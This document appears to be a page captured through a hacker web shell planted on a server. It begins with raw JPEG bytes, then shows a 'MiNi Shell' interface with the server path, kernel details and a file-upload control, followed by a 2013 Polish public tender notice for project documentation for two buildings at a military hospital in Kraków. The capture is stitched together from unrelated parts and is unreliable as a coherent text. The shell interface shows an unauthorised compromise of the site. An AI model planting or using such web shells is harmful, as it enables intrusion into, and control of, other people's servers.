JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130830/173831-N-2013.html

<p class="kh_header"><b>Kraków: Wykonanie dokumentacji projektowej i kosztorysowej dla budynków nr 1 i 12 na terenie 5 Wojskowego Szpitala Klinicznego z Polikliniką SP ZOZ w Krakowie ul. Wrocławska 1-3 wraz ze sprawowaniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 173831 - 2013; data zamieszczenia: 30.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej i kosztorysowej dla budynków nr 1 i 12 na terenie 5 Wojskowego Szpitala Klinicznego z Polikliniką SP ZOZ w Krakowie ul. Wrocławska 1-3 wraz ze sprawowaniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA: Wykonanie dokumentacji projektowej i kosztorysowej dla zadania nr 91343 - Modernizacja Polikliniki - budynek nr 1 pakiet nr 1 oraz Wykonanie dokumentacji projektowej i kosztorysowej dla zadania nr 91344  Modernizacja Polikliniki - budynek nr 12  pakiet nr 2 na terenie 5 Wojskowego Szpitala Klinicznego z Polikliniką SP ZOZ w Krakowie ul. Wrocławska 1-3, zgodnie z załącznikami Programem inwestycji oraz minimalnymi wojskowymi wymaganiami organizacyjno-użytkowymi dla zadania inwestycyjnego oraz wraz ze sprawowaniem nadzoru autorskiego zarówno dla pakietu nr 1, jak i pakietu nr 2. KOD CPV: 45453000-7.
Zgodnie z programem inwestycji w tym zakresie zamówienie w zakresie pakietu nr 1 zostanie wykonane etapami: 
ETAP I - Opracowania wstępne - PRACE PROJEKTOWE PRZYGOTOWAWCZE (termin wykonania  - 3 miesiące od dnia podpisania umowy)
1.	 Badanie geologiczne gruntu; 
2.	Odkrywki fundamentów w celu ich inwentaryzacji; 
3.	Inwentaryzacja architektoniczna pełna; 
4.	Inwentaryzacja konstrukcyjna w niezbędnym zakresie;  
5.	Inwentaryzacja - rozeznanie w poszczególnych branżach  instalacyjnych w niezbędnym zakresie; 
6.	Rozeznanie sieci i przyłączy dotyczących budynku oraz ich parametrów. 
7.	Uzyskanie wewnętrznych warunków technicznych oraz wytycznych Inwestora,
8.	Uzyskanie niezbędnej dokumentacji geodezyjnej /wypisy z rejestru gruntów, wyrysy z ewidencji gruntów, kopia mapy zasadniczej do celów projektowych,
9.	Program funkcjonalno - użytkowy;
10.	Operat na temat dostosowania budynku do aktualnych warunków technicznych w szczególności w zakresie ochrony przeciwpożarowej budynku;
11.	Koncepcja wielobranżowa przebudowy uzgodniona z Zamawiającym na podstawie zatwierdzonego programu funkcjonalno - użytkowego;
Konsultacje szczegółowe z Użytkownikami
Konsultacje z Rzeczoznawcami
Określenie wytycznych dla ochrony p. poż. 
Ramowe wytyczne technologiczne
Projekt koncepcyjny
Szacunkowe koszty inwestycji 
Wizualizacja
12.	Niezbędne opinie techniczne i uzgodnienia:
Wytyczne konserwatorskie
Opinia Miejskiego Konserwatora Zabytków dotycząca koncepcji z uwzględnieniem wytycznych Operatu Ppoż; 
13.	Bilans energetyczny budynku wraz zaleceniami uwzględniającymi wytyczne konserwatorskie;  
14.	Określenie zapotrzebowania na media: wodę, energię elektryczną, energię cieplną, gaz i sposobu odprowadzania lub oczyszczania ścieków, a także innych potrzeb w zakresie infrastruktury technicznej, a w razie potrzeby sposobu unieszkodliwiania odpadów;
15.	Określenie planowanego sposobu zagospodarowania terenu; 
16.	Sporządzenie ZKZ wstępne oraz harmonogramu
17.	Złożenie wniosku o wydanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego, reprezentowanie zamawiającego w postępowaniu, obsługa formalna; 
ETAP II - Projekty budowlane (termin wykonania - 7 miesięcy od dnia podpisania umowy)
1	Uzyskanie niezbędnych wytycznych Miejskiego Konserwatora Zabytków dotyczących koncepcji remontu    
budynku;
2	Uzyskanie decyzji o środowiskowych uwarunkowaniach (jest wymagane dla planowanych: przedsięwzięć mogących zawsze znacząco oddziaływać na środowisko, przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko), lub decyzji umarzającej
3	Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego
4	Projekt architektoniczny;
5	Projekt zagospodarowanie terenu;
6	Projekt zieleni w najbliższym sąsiedztwie obiektu;
7	Ekspertyza konstrukcyjna o stanie technicznym budynku;
8	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów;
9	Ekspertyzy technicznej właściwej jednostki badawczo-rozwojowej albo rzeczoznawcy budowlanego oraz do spraw zabezpieczeń przeciwpożarowych, uzgodnionych z Wojskową  Strażą Pożarną;
10	Projekty instalacji elektrycznych:
11	Projekty instalacji słaboprądowych i teletechnicznych:
12	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
wymiana instalacji i osprzętu dachowego,
13	Projekty instalacji sanitarnych:
13.1         Projekt instalacji wodno - kanalizacyjnej 
13.2 Projekt instalacji centralnego ogrzewania:
13.3 Wentylacja i Klimatyzacja
14 Projekty budowlane winny być zgodne z obowiązującymi przepisami  i sztuką budowlaną 
i uzgodnione z:
Rzeczoznawcą ds. sanitarno - epidemiologicznych;
Rzeczoznawcą ds. p.poż.;
Rzeczoznawcą ds. BHP
Użytkownikiem.
Dostawcami mediów ( Dział techniczny Szpitala, MPEC, TAURON, MPWiK )
Inne niezbędne  
15.  Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
16.	Uzyskanie pozwolenia  konserwatorskiego na wykonanie prac.
17.	Złożenie wniosku o wydanie decyzji pozwolenia na budowę.
ETAP III Projekty wykonawcze(termin wykonania - 2 miesiące od dnia ostateczności decyzji o pozwolenie na budowę, nie później niż 13 miesięcy od dnia podpisania umowy)
1.	Projekt architektoniczny z detalami, elementami wykończenia i wyposażeniem;
2.	Projekt wnętrz dla części pomieszczeń
3.	Projekt zagospodarowania terenu
4.	Projekt zieleni w najbliższym sąsiedztwie obiektu;
5.	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów;
6.	Projekty instalacji elektrycznych
7.	Projekty instalacji słaboprądowych i teletechnicznych:
8.	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
9.    Projekty instalacji sanitarnych:
9.1 Projekt instalacji wodno - kanalizacyjnej 
9.2 Projekt instalacji centralnego ogrzewania:
10. Wentylacja i Klimatyzacja
11. Przedmiary robót, kosztorysy inwestorskie i Specyfikacje Techniczne
    Wykonania i Odbioru Robót do projektów WKI j.w.,  ZKZ po zakończeniu prac projektowo-kosztorysowych.
12. Uzyskanie ostatecznej decyzji pozwolenia na budowę.
13. Ewentualnie uzyskanie decyzji o wyrażeniu zgody na usunięcie kolidujących drzew lub krzewów
ETAP IV - uczestniczenie w pracach komisji przetargowej powołanej do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane
ETAP V - Pełnienie nadzorów autorskich w trakcie realizacji prac budowlanych oraz uczestniczenie w naradach dotyczących postępu prac przy realizacji inwestycji.
Zgodnie z programem inwestycji w tym zakresie zamówienie w zakresie pakietu nr 2 zostanie wykonane etapami:
ETAP I - Opracowania wstępne - PRACE PROJEKTOWE PRZYGOTOWAWCZE (termin wykonania  - 3 miesiące od dnia podpisania umowy)
1	Badanie geologiczne gruntu; 
2	Odkrywki fundamentów w celu ich inwentaryzacji; 
3	Inwentaryzacja architektoniczna pełna; 
4	Inwentaryzacja konstrukcyjna w niezbędnym zakresie;  
5	Inwentaryzacja - rozeznanie w poszczególnych branżach instalacyjnych w niezbędnym zakresie; 
6	Rozeznanie sieci i przyłączy dotyczących budynku oraz ich parametrów. 
7	Uzyskanie wewnętrznych warunków technicznych oraz wytycznych Inwestora,
8	Niezbędna dokumentacja geodezyjna / wypisy z rejestru gruntów, 
wyrysy z ewidencji gruntów, kopia mapa zasadniczej do celów projektowych,
9	Program funkcjonalno - użytkowy;
10	Operat na temat dostosowania budynku do aktualnych warunków technicznych 
w szczególności w zakresie ochrony przeciwpożarowej budynku;
11	Koncepcja wielobranżowa przebudowy uzgodniona z Zamawiającym na podstawie zatwierdzonego programu funkcjonalno - użytkowego;
Konsultacje szczegółowe z Użytkownikami
Konsultacje z Rzeczoznawcami
Określenie wytycznych dla ochrony p. poż. 
Ramowe wytyczne technologiczne
Projekt koncepcyjny
Szacunkowe koszty inwestycji 
Wizualizacja
12.	Opracowanie programu konserwatorskiego wraz z określeniem zakresu odkrywek niezbędnych do wykonania ekspertyzy konstrukcyjnej; 
13.	Niezbędne opinie techniczne i uzgodnienia:
Wytyczne konserwatorskie
Opinia Miejskiego Konserwatora Zabytków dotycząca koncepcji 
z uwzględnieniem wytycznych Operatu Ppoż; 
14.	Bilans energetyczny budynku wraz zaleceniami uwzględniającymi wytyczne konserwatorskie;  
15.	Określenie zapotrzebowania na media: wodę, energię elektryczną, energię cieplną, gaz i sposobu odprowadzania lub oczyszczania ścieków, a także innych potrzeb w zakresie infrastruktury technicznej, a w razie potrzeby sposobu unieszkodliwiania odpadów;
16.	Określenie planowanego sposobu zagospodarowania terenu; 
17.	Sporządzenie ZKZ wstępne oraz harmonogramu
18.	Złożenie wniosku o Ustalenie Lokalizacji Inwestycji Celu Publicznego, reprezentowanie Zamawiającego w postępowaniu, obsługa formalna; 
ETAP II - Projekty budowlane (termin wykonania - 7 miesięcy od dnia podpisania umowy)
1.	Uzyskanie niezbędnych wytycznych Miejskiego Konserwatora Zabytków dotyczącą koncepcji remontu    
budynku;
2.	Uzyskanie decyzji o środowiskowych uwarunkowaniach (jest wymagane dla planowanych: przedsięwzięć mogących zawsze znacząco oddziaływać na środowisko, przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko), lub decyzji umarzającej; 
3.	Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego
4.	Projekt architektoniczny;
5.	Projekt zagospodarowanie terenu;
6.	Projekt zieleni w najbliższym sąsiedztwie obiektu;
7.	Projekt ochrony radiologicznej;
8.	Ekspertyza konstrukcyjna o stanie technicznym budynku;
9.	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów
10.	Ewentualne odkrywki na podstawie programu konserwatorskiego i zgody od MKZ niezbędne do projektu konstrukcyjnego;
11.	Ekspertyzy technicznej właściwej jednostki badawczo-rozwojowej albo rzeczoznawcy budowlanego oraz do spraw zabezpieczeń przeciwpożarowych, uzgodnionych z Wojskową  Strażą Pożarną;
12.	Projekty instalacji elektrycznych:
13.	Projekty instalacji słaboprądowych i teletechnicznych:
14.	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
wymiana instalacji i osprzętu dachowego,
15.	Projekty instalacji sanitarnych:
15.1 Projekt instalacji wodno - kanalizacyjnej 
15.2 Projekt instalacji centralnego ogrzewania:
16 Wentylacja i Klimatyzacja
17 Projekty budowlane winny być zgodne z obowiązującymi przepisami  i sztuką budowlaną 
i uzgodnione z:
Rzeczoznawcą ds. sanitarno - epidemiologicznych;
Rzeczoznawcą ds. p.poż.;
Rzeczoznawcą ds. BHP
Użytkownikiem.
Dostawcami mediów ( Dział techniczny Szpitala, MPEC, TAURON, MPWiK )
Inne niezbędne 
18.	Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
19.	Uzyskanie pozwolenia  konserwatorskiego na wykonanie prac.
20.	Złożenie wniosku o wydanie decyzji pozwolenia na budowę.
ETAP III - Projekty wykonawcze(termin wykonania - 2 miesiące od dnia ostateczności decyzji o pozwolenie na budowę, nie później niż 13 miesięcy od dnia podpisania umowy)
1	Projekt architektoniczny z detalami, elementami wykończenia i wyposażeniem;
2	Projekt wnętrz dla części pomieszczeń
3	Projekt zagospodarowanie terenu;
4	Projekt zieleni w najbliższym sąsiedztwie obiektu;
5	Projekt ochrony radiologicznej;
6	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów;
7	Projekty instalacji elektrycznych:
8.	Projekty instalacji słaboprądowych i teletechnicznych:
9.	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
10.    	Projekty instalacji sanitarnych:
10.1 	Projekt instalacji wodno - kanalizacyjnej 
10.2 	Projekt instalacji centralnego ogrzewania:
11.	 Wentylacja i Klimatyzacja
12. Przedmiary robót, kosztorysy inwestorskie i Specyfikacje Techniczne
    Wykonania i Odbioru Robót do projektów WKI j.w.,  ZKZ po zakończeniu prac projektowo-kosztorysowych.
13. Uzyskanie ostatecznej decyzji pozwolenia na budowę.
14. Ewentualnie uzyskanie decyzji o wyrażeniu zgody na usunięcie kolidujących drzew lub krzewów
ETAP IV - uczestniczenie w pracach komisji przetargowej powołanej do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane,
ETAP V - Pełnienie nadzorów autorskich w trakcie realizacji prac budowlanych oraz uczestniczenie w naradach dotyczących postępu prac przy realizacji inwestycji.
3. Na opracowanie będące przedmiotem zamówienia się następujące opracowania:
wykonanie mapy sytuacyjno-wysokościowej do celów projektowych 
wykonanie inwentaryzacji budynków do celów projektowych 
wykonanie niezbędnych ekspertyz 
sporządzenie koncepcji programowo przestrzennej, zakończonej uzyskaniem uzgodnień z Miejskim Konserwatorem Zabytków oraz uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego 
sporządzenie charakterystyki energetycznej obiektu i audytu energetycznego
w zależności od potrzeb opracowanie projektu geologicznego inżynierskiego 
wykonanie informacji bezpieczeństwa i ochrony zdrowia (BIOZ) 
wykonanie dokumentacji budowlanej - 5 egz. w wersji papierowej(w tym jedna kopia papierowa kolorowa po opieczętowaniu przez Wojewodę Małopolskiego Wydział Infrastruktury)  oraz 2 egz. w wersji elektronicznej w formacie PDF. 
uzyskanie wymaganych pozwoleń, zezwoleń zakończone uzyskaniem pozwoleniem na budowę 
wykonanie dokumentacji wykonawczej - 5 egz. w wersji papierowej oraz 2 egz. w wersji elektronicznej w formacie PDF
wykonanie dokumentacji kosztorysowej - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
wykonanie przedmiaru robót - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
ZKZ wstępne i końcowe oraz harmonogram - 3 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
UWAGA - pliki i foldery mają być opisane w sposób określający ich zawartość
4.Wymagania dotyczące formy projektów i opracowań kosztorysowych:
Projekty budowlane należy wykonać zgodnie z przepisami obowiązującymi w chwili ich sporządzania, którymi na dzień wszczęcia postępowania są przepisy Ustawy - Prawo budowlane z dnia 7 lipca 1994 r. (Dz.U.2010.243.1623) i Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.2012.462), Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. (Dz. U. Nr 202, poz. 2072) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz z uwzględnieniem warunków uzyskanych w opiniach i uzgodnieniach. Poszczególne części projektu, każdy w swoim zakresie, powinny precyzować warunki wykonania i odbioru danego rodzaju robót, w formie rysunkowej i opisowej oraz podawać specyfikacje techniczne opracowane dla projektowanych rozwiązań technicznych jak również odwoływać się do opisów technologii i warunków technicznych wykonania i odbiorów robót określanych w dostępnej literaturze technicznej. Zakres opracowań projektowych powinien uwzględnić wymagania określone w minimalnych wojskowych wymaganiach organizacyjno-użytkowych dla zadania inwestycyjnego oraz w Programie inwestycji. 
Bezwzględnym wymaganiem jest, aby dokumentacja projektowa była uzgadniana w trakcie prac z Zamawiającym (na bieżąco), a następnie uzyskała jednoznaczną akceptację Zamawiającego, tj. koncepcja architektoniczna, projekt budowlany, projekt wykonawczy.
4.	Wymagania dotyczące kosztorysowania:
Kosztorys inwestorski należy sporządzić metodą kalkulacji szczegółowej oraz uproszczonej (należy w nim umieścić co najmniej zestawienie materiałów), zgodnie z rozporządzenia Ministra Infrastruktury z 18.05.2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego (Dz. U. Nr 130, poz. 1389 z dnia 8.06.2004 r.)
5.  Zestawienie Kosztów Zadania końcowego (ZKZ) należy sporządzić na postawie kosztorysów inwestorskich, zgodnie z rozporządzeniem Rady Ministrów w sprawie szczegółowych zasad finansowania inwestycji z budżetu państwa - przy określaniu kosztów inwestycji. 
6. Specyfikacja techniczna warunków wykonania i odbioru robót: w oparciu o Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. Dz. U. Nr 202, poz. 2072 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. Opracowanie ma zawierać zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagane właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz określenie zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru.
7. Założenia wyjściowe do kosztorysowania: W opracowaniu należy określić dane techniczne, technologiczne i organizacyjne nieokreślone w dokumentacji projektowej i specyfikacji technicznej warunków wykonania i odbioru robót budowlanych.
8.  Wymagane uzgodnienia projektu budowlanego: Obiekty będą zlokalizowane na terenie zamkniętym w rozumieniu ustawy - Prawo budowlane..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia w zakresie pakietu nr 1(budynek nr 1) mogą się ubiegać Wykonawcy którzy wykażą, iż w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, wykonali co najmniej jedną - zakończoną -  dokumentację projektową, tj. projekt budowlany z uzyskaniem pozwolenia na budowę i projekty wykonawcze o wartości co najmniej 150 000 zł, której przedmiotem była nadbudowa, przebudowa lub remont obiektu służby zdrowia(przez obiekt służby zdrowia Zamawiający rozumie budynki zakwalifikowane do klasy 1264 zgodnie z PKOB).
O udzielenie zamówienia w zakresie pakietu nr 2(budynek nr 12) mogą się ubiegać Wykonawcy którzy wykażą, iż w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, wykonali co najmniej jedną - zakończoną -  dokumentację projektową, tj. projekt budowlany z uzyskaniem pozwolenia na budowę i projekty wykonawcze o wartości co najmniej 150 000 zł, której przedmiotem była nadbudowa, przebudowa lub remont obiektu służby zdrowia(przez obiekt służby zdrowia Zamawiający rozumie budynki  zakwalifikowane do klasy 1264 zgodnie z PKOB).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia w pakiecie nr 1 (budynek nr 1) mogą się ubiegać Wykonawcy którzy wykażą, iż członkowie zespołu projektowego  posiadają : 
uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej,  oraz co najmniej 3 letnią praktykę zawodową i doświadczenie w trakcie której wykonał co najmniej jeden projekt w zakresie nadbudowy, przebudowy, remontu  obiektu służby zdrowia(przez obiekt służby zdrowia Zamawiający rozumie budynki zakwalifikowane do klasy 1264 zgodnie z PKOB) - 1 osoba (główny projektant)
uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjnej-budowlanej - 1 osoba
uprawnienia do projektowania bez ograniczeń w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - 1 osoba
uprawnienia do projektowania bez ograniczeń w zakresie instalacji urządzeń elektrycznych i elektroenergetycznych  - 1 osoba
uprawnienia do projektowania bez ograniczeń w zakresie teletechniki i automatyki - 1 osoba
O udzielenie zamówienia w pakiecie nr 2 (budynek nr 12) mogą się ubiegać Wykonawcy mogą się ubiegać Wykonawcy którzy wykażą, iż członkowie zespołu projektowego (przynależącymi do Izby Architektów, lub do Izby Inżynierów Budownictwa) posiadają :
uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej oraz co najmniej 3 letnią praktykę zawodową i doświadczenie w trakcie której wykonał co najmniej jeden projekt w zakresie nadbudowy, przebudowy, remontu obiektu służby zdrowia(przez obiekt służby zdrowia Zamawiający rozumie budynki zakwalifikowane do klasy 1264 zgodnie z PKOB) oraz co najmniej jeden projekt w zakresie przebudowy, remontu obiektu zabytkowego - 1 osoba(główny projektant)
uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjnej-budowlanej - 1 osoba
uprawnienia do projektowania bez ograniczeń w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - 1 osoba
uprawnienia do projektowania bez ograniczeń w zakresie instalacji urządzeń elektrycznych i elektroenergetycznych  - 1 osoba
uprawnienia do projektowania bez ograniczeń w zakresie teletechniki i automatyki - 1 osoba</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
